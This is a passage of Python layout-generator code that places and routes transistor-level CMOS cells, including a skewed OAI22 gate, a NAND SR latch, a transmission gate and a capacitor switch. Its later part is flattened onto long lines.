    rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in7.name)
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin,
                      pinname_list = ['A', 'B', 'C', 'D', 'O'], rect_list=[ra0, rb0, rc0, rd0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_oai22_skewed_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                             routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary,
                             devname_nmos_body_left, devname_nmos_body_right, devname_nmos_space,
                             devname_pmos_boundary, devname_pmos_body_2stack, origin=np.array([0,
                             0]), create_pin=False):
    """generate a skewed 1x OAI22 gate at transistor level.

    Same A/B/C/D/O topology as generate_oai22_1x, but with an extra PMOS
    2-stack (ip6) tied in parallel on the pull-up and NMOS spacer cells (in8),
    skewing the pull-up/pull-down drive ratio.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    # placement
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name)
    in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name)
    in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name)
    in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name)
    in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_left, gridname = pg, refinstname = in4.name)
    in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_right, gridname = pg, refinstname = in5.name)
    in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name)
    in8 = laygen.relplace(name = "I"+objectname_pfix + 'N8', templatename = devname_nmos_space, gridname = pg, refinstname = in7.name, shape=np.array([4, 1]))
    ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX')
    ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='MX')
    ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='MX')
    ip5a = laygen.relplace(name = "I"+objectname_pfix + 'P5a', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5.name, transform='MX')
    ip5b = laygen.relplace(name = "I"+objectname_pfix + 'P5b', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip5a.name, transform='MX')
    ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip5b.name, transform='MX')
    ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='MX')
    # route
    # A: m1 gate tie N1.G0-P1.G0, m2 strap, m3 stub for the pin
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend")
    ra0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                       refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    # B: N2.G0-P1.G1
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in2.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G1')
    laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend")
    rb0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                       refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3)
    # C: N5.G0-P5.G0, with an extra parallel gate tie at x-offset 6 (reaches the skew devices)
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0')
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([6, 0]), xy1=np.array([6, 0]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2)
    laygen.via(None, np.array([6, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([6, 0]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', endstyle0="extend", endstyle1="extend")
    rc0 = laygen.route("R"+objectname_pfix+"C0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3,
                       refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3)
    # D: N6.G0-P5.G1, strapped out to x-offset 2 for the extra pull-up
    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in6.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G1')
    laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2)
    laygen.via(None, np.array([2, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2,
                 refinstname0=ip5.name, refpinname0='G1', refinstname1=ip5.name, refpinname1='G1', endstyle0="extend", endstyle1="extend")
    rd0 = laygen.route("R"+objectname_pfix+"D0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3,
                       refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=ip5.name, refpinname='G1', gridname=rg_m2m3)
    # PDN-internal
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                 refinstname0=in1.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                 refinstname0=in5.name, refpinname0='S0', refinstname1=in6.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # PUP-internal (second strap reaches x-offset 2 for the extra pull-up stack)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2,
                 refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2,
                 refinstname0=ip1.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # output
    ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3,
                       refinstname0=in6.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0', via0=[[0, 0]], via1=[[0, 0]])
    # power and ground route
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0 *
np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in2.name, refinstname1=in2.name)  # completes the N2 drain tap opened on the previous line
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip5.name, refinstname1=ip5.name)
    # extra VDD tap for the skew pull-up (ip6), shifted by 2 tracks
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0])+np.array([2,0]), xy1=xy_s0+np.array([2,0]), gridname0=rg_m1m2, refinstname0=ip6.name, refinstname1=ip6.name)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2)
    laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=in2.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip5.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0])+np.array([2,0]), refinstname=ip6.name, gridname=rg_m1m2)
    # power and ground rail
    xy = laygen.get_xy(obj = in1.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip7.name)
    rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in7.name)
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin,
                      pinname_list = ['A', 'B', 'C', 'D', 'O'], rect_list=[ra0, rb0, rc0, rd0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_ndsr(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4,
                  origin=np.array([0, 0]), m=2, create_pin=False):
    """generate nand type SR latch: cross-coupled NANDs ND0/ND1 with output
    buffers INV0 (Q) and INV1 (QB)."""
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m3m4 = routing_grid_m3m4
    # placement
    i0 = laygen.place("I"+objectname_pfix + 'ND0', "nand_"+str(m)+"x", pg, xy=origin)
    i1 = laygen.relplace(name = "I"+objectname_pfix + 'ND1', templatename = "nand_"+str(m)+"x", gridname = pg, refinstname = i0.name)
    i2 = laygen.relplace(name = "I"+objectname_pfix + 'INV0', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i1.name)
    i3 = laygen.relplace(name = "I"+objectname_pfix + 'INV1', templatename = "inv_"+str(m)+"x", gridname = pg, refinstname = i2.name)
    # internal pins
    nd0_a_xy = laygen.get_inst_pin_xy(i0.name, 'A', rg_m3m4)
    nd0_b_xy = laygen.get_inst_pin_xy(i0.name, 'B', rg_m3m4)
    nd0_o_xy = laygen.get_inst_pin_xy(i0.name, 'O', rg_m3m4)
    nd1_a_xy = laygen.get_inst_pin_xy(i1.name, 'A', rg_m3m4)
    nd1_b_xy = laygen.get_inst_pin_xy(i1.name, 'B', rg_m3m4)
    nd1_o_xy = laygen.get_inst_pin_xy(i1.name, 'O', rg_m3m4)
    buf0_i_xy = laygen.get_inst_pin_xy(i2.name, 'I', rg_m3m4)
    buf0_o_xy = laygen.get_inst_pin_xy(i2.name, 'O', rg_m3m4)
    buf1_i_xy = laygen.get_inst_pin_xy(i3.name, 'I', rg_m3m4)
    buf1_o_xy = laygen.get_inst_pin_xy(i3.name, 'O', rg_m3m4)
    #route
    y0=nd0_a_xy[0][1]  # base m4 track; Q_pre/Qb_pre run on y0+2 / y0+3
    #Q_pre: ND0 output to its buffer and cross-coupled to ND1.B
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd0_o_xy[1], buf0_i_xy[0], y0+2, rg_m3m4)
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd0_o_xy[1], nd1_b_xy[0], y0+2, rg_m3m4)
    #Qb_pre: ND1 output to its buffer and cross-coupled to ND0.B
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd1_o_xy[1], buf1_i_xy[0], y0+3, rg_m3m4)
    laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], nd1_o_xy[1], nd0_b_xy[0], y0+3, rg_m3m4)
    #pin
    if create_pin == True:
        laygen.pin(name='S', layer=laygen.layers['pin'][3], xy=nd0_a_xy, gridname=rg_m3m4)
        laygen.pin(name='R', layer=laygen.layers['pin'][3], xy=nd1_a_xy, gridname=rg_m3m4)
        laygen.pin(name='Q', layer=laygen.layers['pin'][3], xy=buf0_o_xy, gridname=rg_m3m4)
        laygen.pin(name='QB', layer=laygen.layers['pin'][3], xy=buf1_o_xy, gridname=rg_m3m4)
        #power pin
        rvdd0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VDD', rg_m2m3)
        rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV1', 'VDD', rg_m2m3)
        rvss0_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'ND0', 'VSS', rg_m2m3)
        rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'INV1', 'VSS', rg_m2m3)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2)

##Add by zhongkai
def generate_tgate_dn(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                      routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body,
                      devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space,
                      m=1, n=1, m_in=3, m_out=3, origin=np.array([0,0]), create_pin=False):
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m = max(1, int(m / 2))  # passgate size, using nf=2 devices
    n = max(1, int(n / 2))  # pulldown size, using nf=2 devices
    if m_in > m/2:
        m_in = int(m/2) #input paths
    if m_out > m/2:
        m_out = int(m/2) #output_paths
    # placement
    in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin)
    in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name, shape=np.array([2, 1]))
    in3 = laygen.relplace(name = "I"+objectname_pfix+'N3', templatename = devname_nmos_body, gridname = pg, refinstname = in2.name,
shape=np.array([n, 1])) in4 = laygen.relplace(name = "I"+objectname_pfix+'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name) ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1])) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip2.name, shape=np.array([n+4,1]), transform='MX') # route #to vss for i in range(n): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([i, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='S0', refinstindex0=np.array([n, 0]), refinstname1=in3.name, refpinname1='S0', refinstindex1=np.array([n, 0])) laygen.via(None, np.array([0, 0]), refinstname=in3.name, gridname=rg_m1m2, refinstindex=np.array([n, 0])) # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', 
refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3) # gate for pull down in3_g0_xy = laygen.get_inst_pin_xy(in3.name, 'G0', rg_m2m3) ip1_g0_xy = laygen.get_inst_pin_xy(ip1.name, 'G0', rg_m2m3) laygen.route_vh(laygen.layers['metal'][1], laygen.layers['metal'][2], in3_g0_xy[0], ip1_g0_xy[0], rg_m1m2) for i in range(n): laygen.via(None, np.array([0, 0]), refinstname=in3.name, refpinname='G0', gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in3.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in3.name, refpinname1='G0', refinstindex1=np.array([n-1, 0])) #input #input wire for i in range(m_in): rix = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', 
refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) if create_pin == True: laygen.pin(gridname=rg_m2m3, name='I_'+str(i), layer=laygen.layers['pin'][3], refobj=rix, netname='I') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #connecting source for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) #output #output wire for i in range(m_out): rox = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1-i, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1-i, 0])) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1-i, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 
1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1-i, 0]), gridname=rg_m2m3) if create_pin == True: laygen.pin(gridname=rg_m2m3, name='O_'+str(i), layer=laygen.layers['pin'][3], refobj=rox, netname='O') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #connection for in3 laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([m-1, 0]), refinstname1=in3.name, refpinname1='D0', refinstindex1=np.array([n-1, 0])) #connecting drain for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #connection for in3 for i in range(n): laygen.via(None, np.array([0, 1]), refinstname=in3.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = ip3.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip3.name, refinstindex1=np.array([n+3, 0])) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, 
layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB'], rect_list=[ren0, renb0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_cap_sw(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_nmos_space, devname_pmos_boundary, devname_pmos_body, devname_pmos_space, m=1, origin=np.array([0,0]), create_pin=False): #generate an nmos type switch pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I" + objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = 'pmos4_fast_space', gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = 'pmos4_fast_space', gridname = pg, refinstname = ip1.name, transform='MX') # route # to ground for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S0', refinstindex1=np.array([i, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, gridname=rg_m1m2, 
refinstindex=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, -1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.via(None, np.array([0, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([m, 0])) # en, enb for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) #output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend') for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) ro=[] for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3) ro0 = laygen.route(None, 